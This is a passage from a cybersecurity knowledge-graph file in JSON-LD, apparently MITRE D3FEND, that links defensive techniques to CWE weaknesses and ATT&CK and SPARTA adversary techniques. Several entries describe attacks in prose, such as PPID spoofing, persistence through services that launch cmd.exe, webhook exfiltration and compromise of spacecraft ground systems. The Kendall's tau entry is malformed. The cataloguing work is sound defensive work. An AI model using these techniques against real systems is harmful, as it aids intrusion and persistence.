    },
    {
      "@id": "d3f:owns",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x owns y: The subject x has ownership or possession of some object y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02209474-v"
      },
      "rdfs:label": "owns",
      "rdfs:seeAlso": {
        "@id": "dbr:Ownership"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      },
      "skos:altLabel": "possesses"
    },
    {
      "@id": "d3f:CCI-001495_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects audit tools from unauthorized deletion.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:PlatformHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-29T00:00:00"
      },
      "rdfs:label": "CCI-001495"
    },
    {
      "@id": "d3f:NetworkPacket",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A network packet is a formatted unit of data carried by a packet-switched network. Computer communications links that do not support packets, such as traditional point-to-point telecommunications links, simply transmit data as a bit stream. When data is formatted into packets, packet switching is possible and the bandwidth of the communication medium can be better shared among users than with circuit switching.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Network_packet"
      },
      "rdfs:label": "Network Packet",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:Reference-ServicesLaunchingCmd_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": ""
      },
      "d3f:kb-abstract": "Windows runs the Service Control Manager (SCM) within the process services.exe. Windows launches services as independent processes or DLL loads within a svchost.exe group. To be a legitimate service, a process (or DLL) must have the appropriate service entry point SvcMain. If an application does not have the entry point, then it will timeout (default is 30 seconds) and the process will be killed.\n\nTo survive the timeout, adversaries and red teams can create services that direct to cmd.exe with the flag /c, followed by the desired command. The /c flag causes the command shell to run a command and immediately exit. As a result, the desired program will remain running and it will report an error starting the service. This analytic will catch that command prompt instance that is used to launch the actual malicious executable. Additionally, the children and descendants of services.exe will run as a SYSTEM user by default. Thus, services are a convenient way for an adversary to gain Persistence and Privilege Escalation.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-05-002: Services launching Cmd",
      "rdfs:label": "Reference - CAR-2014-05-002: Services launching Cmd - MITRE"
    },
    {
      "@id": "d3f:T1134.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1134.004",
      "d3f:definition": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft UAC Nov 2018)",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "Parent PID Spoofing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1134"
        },
        {
          "@id": "_:Nfb8f05303018433197c4bc2755fe90c0"
        }
      ]
    },
    {
      "@id": "_:Nfb8f05303018433197c4bc2755fe90c0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:HardwareDeviceDisconnectionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the removal of a device from a system, ceasing its operational functionality or availability.",
      "rdfs:label": "Hardware Device Disconnection Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceStateEvent"
        },
        {
          "@id": "_:Nbff8c1db4e18444fbc78f66a9820c51f"
        }
      ]
    },
    {
      "@id": "_:Nbff8c1db4e18444fbc78f66a9820c51f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDeviceConnectionEvent"
      }
    },
    {
      "@id": "d3f:CWE-228",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-228",
      "d3f:definition": "The product does not handle or incorrectly handles input that is not syntactically well-formed with respect to the associated specification.",
      "rdfs:label": "Improper Handling of Syntactically Invalid Structure",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-703"
        },
        {
          "@id": "d3f:CWE-707"
        }
      ]
    },
    {
      "@id": "d3f:CWE-790",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-790",
      "d3f:definition": "The product receives data from an upstream component, but does not filter or incorrectly filters special elements before sending it to a downstream component.",
      "rdfs:label": "Improper Filtering of Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:T1446",
      "@type": "owl:Class",
      "d3f:attack-id": "T1446",
      "d3f:definition": "An adversary may seek to lock the legitimate user out of the device, for example to inhibit user interaction or to obtain a ransom payment.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1629.002",
      "rdfs:label": "Device Lockout - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1629.002"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileImpactTechnique"
        }
      ],
      "skos:prefLabel": "Device Lockout"
    },
    {
      "@id": "d3f:RD-0005.04",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0005.04",
      "d3f:definition": "Electronic ASAT attacks target the communications lifelines of space systems rather than their structures: jamming raises the noise floor to deny service; spoofing crafts believable but false signals (navigation, timing, or control). These effects are usually transient and can be difficult to attribute quickly, yet they are operationally useful and comparatively inexpensive. Actors may obtain portable or fixed jammers, high-gain antennas with agile waveforms, and specialized signal-processing toolchains; from orbit, a nearby asset can deliver highly selective interference.",
      "rdfs:label": "Electronic ASAT - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0005/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0005"
      },
      "skos:prefLabel": "Electronic ASAT"
    },
    {
      "@id": "d3f:T1117",
      "@type": "owl:Class",
      "d3f:attack-id": "T1117",
      "d3f:definition": "Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries. (Citation: Microsoft Regsvr32)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1218.010",
      "rdfs:label": "Regsvr32",
      "rdfs:seeAlso": {
        "@id": "d3f:T1218.010"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1260",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1260",
      "d3f:definition": "The product allows address regions to overlap, which can result in the bypassing of intended memory protection.",
      "rdfs:label": "Improper Handling of Overlap Between Protected Memory Ranges",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:KendallsRankCorrelationCoefficient",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-KRCC",
      "d3f:definition": "Kendall's $\\\\tau$ between and is given by $(n_c - n_d) / \\\\sqrt((n_c+n_d+n_x)(n_c+n_d+n_y)$, where is the number of concordant pairs of observations, is the number of discordant pairs, is the number of ties involving only the variable, and is the number of ties involving only the variable.\" ;",
      "d3f:kb-article": "## References\n1. Wolfram Research. (2012). KendallTau. Wolfram Language function.  [Link](https://reference.wolfram.com/language/ref/KendallTau.html)\n1. Kendall's Tau. (2023, May 23). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Kendall_rank_correlation_coefficient]\"\"\",",
      "d3f:synonym": "Kendall's Tau Coefficient",
      "rdfs:isDefinedBy": {
        "@id": "https://reference.wolfram.com/language/ref/KendallTau.html"
      },
      "rdfs:label": "Kendall's Rank Correlation Coefficient",
      "rdfs:subClassOf": {
        "@id": "d3f:RankCorrelationCoefficient"
      }
    },
    {
      "@id": "d3f:Model",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTactic"
      ],
      "d3f:definition": "The model tactic is used to apply security engineering, vulnerability, threat, and risk analyses to digital systems. This is accomplished by creating and maintaining a common understanding of the systems being defended, the operations on those systems, actors using the systems, and the relationships and interactions between these elements.",
      "d3f:display-order": -1,
      "d3f:display-priority": 1,
      "rdfs:label": "Model",
      "rdfs:subClassOf": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "d3f:CWE-656",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-656",
      "d3f:definition": "The product uses a protection mechanism whose strength depends heavily on its obscurity, such that knowledge of its algorithms or key data is sufficient to defeat the mechanism.",
      "d3f:synonym": "Never Assuming your secrets are safe",
      "rdfs:label": "Reliance on Security Through Obscurity",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-657"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "d3f:T1591.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1591.004",
      "d3f:definition": "Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.",
      "rdfs:label": "Identify Roles",
      "rdfs:subClassOf": {
        "@id": "d3f:T1591"
      }
    },
    {
      "@id": "d3f:SystemVulnerabilityAssessment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemVulnerabilityAssessment"
      ],
      "d3f:d3fend-id": "D3-SYSVA",
      "d3f:definition": "System vulnerability assessment relates all the vulnerabilities of a system's components in the context of their configuration and internal dependencies and can also include assessing risk emerging from the system's design as a whole, not just the sum of individual component vulnerabilities.",
      "d3f:evaluates": {
        "@id": "d3f:DigitalSystem"
      },
      "d3f:identifies": {
        "@id": "d3f:Vulnerability"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SoftwareVulnerabilityGraphDatabase"
      },
      "rdfs:label": "System Vulnerability Assessment",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemMapping"
        },
        {
          "@id": "_:Nf7e4311bdc93455182443c4224714b7e"
        },
        {
          "@id": "_:N058046607d5c4b1d8b696f972d3497ff"
        }
      ]
    },
    {
      "@id": "_:Nf7e4311bdc93455182443c4224714b7e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:evaluates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalSystem"
      }
    },
    {
      "@id": "_:N058046607d5c4b1d8b696f972d3497ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Vulnerability"
      }
    },
    {
      "@id": "d3f:ATLASImpactTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0011"
      },
      "rdfs:label": "Impact Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N9fe2b53e1ee940ed89ee6387b0012685"
        }
      ],
      "skos:prefLabel": "Impact Technique"
    },
    {
      "@id": "_:N9fe2b53e1ee940ed89ee6387b0012685",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0011"
      }
    },
    {
      "@id": "d3f:CWE-78",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-78",
      "d3f:definition": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.",
      "d3f:may-be-weakness-of": [
        {
          "@id": "d3f:EvalFunction"
        },
        {
          "@id": "d3f:ProcessStartFunction"
        },
        {
          "@id": "d3f:UserInputFunction"
        }
      ],
      "d3f:synonym": [
        "OS Command Injection",
        "Shell injection",
        "Shell metacharacters"
      ],
      "rdfs:label": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-77"
        },
        {
          "@id": "_:N645b1c7a388646c68c5607fd330f335a"
        },
        {
          "@id": "_:Ndcb6cc6106cb4829a5fc4f05dd75bdf3"
        },
        {
          "@id": "_:Nae39756f5a6f4875a9ec80f7c09126c7"
        }
      ]
    },
    {
      "@id": "_:N645b1c7a388646c68c5607fd330f335a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-be-weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EvalFunction"
      }
    },
    {
      "@id": "_:Ndcb6cc6106cb4829a5fc4f05dd75bdf3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-be-weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessStartFunction"
      }
    },
    {
      "@id": "_:Nae39756f5a6f4875a9ec80f7c09126c7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-be-weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:IA-0007",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0007",
      "d3f:definition": "Compromising the ground segment gives an adversary the most direct path to first execution against a spacecraft. Ground systems encompass operator workstations and mission control mission control software, scheduling/orchestration services, front-end processors and modems, antenna control, key-loading tools and HSMs, data gateways (SLE/CSP), identity providers, and cloud-hosted mission services. Once inside, a threat actor can prepare on-orbit updates, craft and queue valid telecommands, replay captured traffic within acceptance windows, or manipulate authentication material and counters to pass checks. The same foothold enables deep reconnaissance: enumerating mission networks and enclaves, discovering which satellites are operated from a site, mapping logical topology between MOC and stations, identifying in-band “birds” reachable from a given aperture, and learning pass plans, dictionaries, and automation hooks. From there, initial access to the spacecraft is a matter of timing and presentation, injecting commands, procedures, or update packages that align with expected operations so the first execution event appears indistinguishable from normal activity.",
      "rdfs:label": "Compromise Ground System - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0007/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Compromise Ground System"
    },
    {
      "@id": "d3f:PrincipalComponentAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PCA",
      "d3f:definition": "Principal components analysis (PCA) creates a new set of orthogonal variables that contain the same information as the original set. It rotates the axes of variation to give a new set of orthogonal axes, ordered so that they summarize decreasing proportions of the variation.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Multivariate statistics. [Link](https://en.wikipedia.org/wiki/Multivariate_statistics)",
      "d3f:synonym": "PCA",
      "rdfs:label": "Principal Component Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:MultivariateAnalysis"
      }
    },
    {
      "@id": "d3f:Reference-AutomaticallyGeneratingRulesForConnectionSecurity_Microsoft",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20120054825"
      },
      "d3f:kb-abstract": "A method and system for creating security policies for firewall and connection policies in an integrated manner is provided. The security system provides a user interface through which a user can define a security rule that specifies both a firewall policy and a connection policy. After the security rule is specified, the security system automatically generates a firewall rule and a connection rule to implement the security rule. The security system provides the firewall rule to a firewall engine that is responsible for enforcing the firewall rules and provides the connection rule to an IPsec engine that is responsible for enforcing the connection rules",
      "d3f:kb-author": "Charles D. Bassett; Eran Yariv; Ian M. Carbaugh; Lokesh Srinivas Koppolu; Maksim Noy; Sarah A. Wahlert; Pradeep Bahl",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:kb-reference-title": "Automatically generating rules for connection security",
      "rdfs:label": "Reference - Automatically generating rules for connection security - Microsoft"
    },
    {
      "@id": "d3f:T1036.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1036.001",
      "d3f:creates": {
        "@id": "d3f:ExecutableBinary"
      },
      "d3f:definition": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)",
      "rdfs:label": "Invalid Code Signature",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1036"
        },
        {
          "@id": "_:Nbaea75140c064f21beaca47a130f1310"
        }
      ]
    },
    {
      "@id": "_:Nbaea75140c064f21beaca47a130f1310",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableBinary"
      }
    },
    {
      "@id": "d3f:CWE-586",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-586",
      "d3f:definition": "The product makes an explicit call to the finalize() method from outside the finalizer.",
      "rdfs:label": "Explicit Call to Finalize()",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:AgentGroup",
      "@type": "owl:Class",
      "rdfs:label": "Agent Group",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Group"
        },
        {
          "@id": "_:Neb45e16bbf10494186bbb23ee1c5c780"
        }
      ]
    },
    {
      "@id": "_:Neb45e16bbf10494186bbb23ee1c5c780",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "d3f:DeleteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Remove a file from a machine.",
      "d3f:deletes": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Delete File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N9492eb2912be4326829db578150dca19"
        }
      ]
    },
    {
      "@id": "_:N9492eb2912be4326829db578150dca19",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-85",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-85",
      "d3f:definition": "The web application does not filter user-controlled input for executable script disguised using doubling of the involved characters.",
      "rdfs:label": "Doubled Character XSS Manipulations",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-79"
      }
    },
    {
      "@id": "d3f:T1017",
      "@type": "owl:Class",
      "d3f:attack-id": "T1017",
      "d3f:definition": "Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1072",
      "rdfs:label": "Application Deployment Software",
      "rdfs:seeAlso": {
        "@id": "d3f:T1072"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LateralMovementTechnique"
      }
    },
    {
      "@id": "d3f:WirelessAccessPoint",
      "@type": "owl:Class",
      "d3f:definition": "In computer networking, a wireless access point (WAP), or more generally just access point (AP), is a networking hardware device that allows other Wi-Fi devices to connect to a wired network. The AP usually connects to a router (via a wired network) as a standalone device, but it can also be an integral component of the router itself. An AP is differentiated from a hotspot which is a physical location where Wi-Fi access is available.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Wireless_access_point"
      },
      "rdfs:label": "Wireless Access Point",
      "rdfs:subClassOf": {
        "@id": "d3f:ComputerNetworkNode"
      },
      "skos:altLabel": "WAP"
    },
    {
      "@id": "d3f:OperationalEvent",
      "@type": "owl:Class",
      "d3f:definition": "An Operational Event is an action or occurrence within an organization's mission or business operations that happens over a period of time.",
      "d3f:synonym": [
        "Business Event",
        "Business Process",
        "Mission Event",
        "Operational Activity Event",
        "Operational Occurrence"
      ],
      "rdfs:label": "Operational Event",
      "rdfs:seeAlso": [
        {
          "@id": "https://en.wikipedia.org/wiki/Unified_Architecture_Framework"
        },
        {
          "@id": "https://en.wikipedia.org/wiki/Event_(BPMN)"
        },
        {
          "@id": "https://www.omg.org/spec/UAF/"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Action"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-004%3AProcessesStartedFromIrregularParent_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-004/"
      },
      "d3f:kb-abstract": "Adversaries may start legitimate processes and then use their memory space to run malicious code. This analytic looks for common Windows processes that have been abused this way in the past; when the processes are started for this purpose they may not have the standard parent that we would expect. This list is not exhaustive, and it is possible for cyber actors to avoid this discepency. These signatures only work if Sysmon reports the parent process, which may not always be the case if the parent dies before sysmon processes the event.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-004: Processes Started From Irregular Parent",
      "rdfs:label": "Reference - CAR-2020-11-004: Processes Started From Irregular Parent - MITRE"
    },
    {
      "@id": "d3f:Reference-SoftwareVulnerabilityGraphDatabase",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/WO2020028535A1"
      },
      "d3f:kb-abstract": "To analyze open-source code at a large scale, a security domain graph language (\"GL\") has been created that functions as a vulnerability description language and facilitates program analysis queries. The SGL facilitates building and maintaining a graph database to catalogue vulnerabilities found in open-source components. This graphical database can be accessed via a database interface directly or accessed by an agent that interacts with the database interface. To build the graph database, a database interface processes an open-source component and creates graph structures which represent relationships present in the open-source component. The database interface transforms a vulnerability description into a canonical form based on a schema for the graph database and updates the database based on a determination of whether the vulnerability is a duplicate. This ensures quality and consistency of the vulnerability dataset maintained in the graph database.",
      "d3f:kb-author": "Darius Tsien Wei FOO, Ming Yi ANG, Asankhaya Sharma, Jie Shun YEO",
      "d3f:kb-organization": "Veracode, Inc.",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:AssetVulnerabilityEnumeration"
        },
        {
          "@id": "d3f:SystemDependencyMapping"
        },
        {
          "@id": "d3f:SystemVulnerabilityAssessment"
        }
      ],
      "d3f:kb-reference-title": "Software vulnerability graph database",
      "rdfs:label": "Reference - Software vulnerability graph database"
    },
    {
      "@id": "d3f:ForwardResolutionIPDenylisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ForwardResolutionIPDenylisting"
      ],
      "d3f:blocks": {
        "@id": "d3f:InboundInternetDNSResponseTraffic"
      },
      "d3f:d3fend-id": "D3-FRIDL",
      "d3f:definition": "Blocking a DNS lookup's answer's IP address value.",
      "d3f:kb-article": "## How it works\n\nThis technique prevents a client from learning IP addresses deemed to be potentially malicious, which would have been delivered via forward resolution responses.\n\nResponses to forward resolution requests (that is, requests where a domain is sent and IP(s) are returned) are collected, and the IP address(es) included as a response are examined. If the IP address(es) are in a range included in the blacklist, then the response is dropped and not forwarded to the client.\n\nThe DNS lookup can be blocked by either dropping the network traffic with an inline device, or modifying the value of the response sent by the DNS server. To transparently prevent client applications from hanging on a request, it is common practice to replace malicious values with addresses in the range 127.0.0.0/8 or the address of a honeypot maintained by the network administrators.\n\n## Considerations\n\n* This technique does not prevent the client from contacting the blacklisted IP, only from learning about this IP address via a nameserver lookup request.\n* DNS Response traffic can be transmitted over many different protocols, which presents a challenge to implementing methods to extract all DNS answer IP address value(s).\n  * DNS has historically used UDP port 53, with TCP port 53 instead used for responses over 512 bytes or after a lack of response over UDP.\n  * Usage of new protocols to provide confidentiality for DNS traffic, such as DoH (DNS over HTTPS) and DoT (DNS over TLS), complicates collection of the IP address(es) in DNS responses. These protocols have often been enabled in browser settings transparently after a browser update, with DNS requests proxied over one of these cryptographic protocols through a specified host.\n* This technique must be implemented logically between the application that receives the response and the server which sent the response.\n  * DNS responses sent in an encrypted manner, such as those using DoH or DoT, will require interception of the TLS connections in order to determine the IP address(es) in the response.\n* Replacing the response is not effective in the case that the nameserver uses a technique to provide integrity of its responses, such as DNSSEC for DNS responses.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-UseDNSPolicyForApplyingFiltersOnDNSQueries"
      },
      "d3f:synonym": "Forward Resolution IP Blacklisting",
      "rdfs:label": "Forward Resolution IP Denylisting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DNSDenylisting"
        },
        {
          "@id": "_:Nc1b30040d8f94153b58c122b7bd1a327"
        }
      ]
    },
    {
      "@id": "_:Nc1b30040d8f94153b58c122b7bd1a327",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:blocks"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundInternetDNSResponseTraffic"
      }
    },
    {
      "@id": "d3f:IA-0009.03",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0009.03",
      "d3f:definition": "The “user segment” encompasses end users and their equipment that interact with mission services, SATCOM terminals, customer ground gateways, tasking portals, and downstream processing pipelines for delivered data. Where these environments interconnect with mission cores, a compromised user domain becomes a springboard. Attackers can inject malformed tasking requests that propagate into payload scheduling, craft user-plane messages that traverse gateways into control or management planes, or seed data products that flow back to mission processing systems and automation. In broadband constellations and hosted services, user terminals may share infrastructure with TT&C or provider management networks, creating opportunities to pivot from customer equipment into provider-run nodes that the spacecraft trusts.",
      "rdfs:label": "User Segment - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0009/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0009"
      },
      "skos:prefLabel": "User Segment"
    },
    {
      "@id": "d3f:Application",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A program that gives a computer instructions that provide the user with tools to accomplish a task; \"he has tried several different word processing applications\".  Distinct from system software that is intrinsically part of the operating system.  An application can be made up of executable files, configuration files, shared libraries, etc.",
      "d3f:may-contain": {
        "@id": "d3f:ApplicationConfiguration"
      },
      "rdfs:label": "Application",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Application_software"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/06582286-n"
        },
        {
          "@id": "https://schema.ocsf.io/objects/application"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Software"
        },
        {
          "@id": "_:N0d7a60054d9049d8b68c0f3d3e5a9f14"
        }
      ]
    },
    {
      "@id": "_:N0d7a60054d9049d8b68c0f3d3e5a9f14",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:T1567.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1567.004",
      "d3f:definition": "Adversaries may exfiltrate data to a webhook endpoint rather than over their primary command and control channel. Webhooks are simple mechanisms for allowing a server to push data over HTTP/S to a client without the need for the client to continuously poll the server.(Citation: RedHat Webhooks) Many public and commercial services, such as Discord, Slack, and `webhook.site`, support the creation of webhook endpoints that can be used by other services, such as Github, Jira, or Trello.(Citation: Discord Intro to Webhooks) When changes happen in the linked services (such as pushing a repository update or modifying a ticket), these services will automatically post the data to the webhook endpoint for use by the consuming application.",
      "rdfs:label": "Exfiltration Over Webhook",
      "rdfs:subClassOf": {
        "@id": "d3f:T1567"
      }
    },
    {
      "@id": "d3f:T1552.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:CloudInstanceMetadata"
      },
      "d3f:attack-id": "T1552.005",
      "d3f:definition": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.",
      "rdfs:label": "Cloud Instance Metadata API",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1552"
        },
        {
          "@id": "_:N62e708ff004c4be9944e03d9350cba9c"
        }
      ]
    },
    {
      "@id": "_:N62e708ff004c4be9944e03d9350cba9c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudInstanceMetadata"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-6_1",
      "@type": [
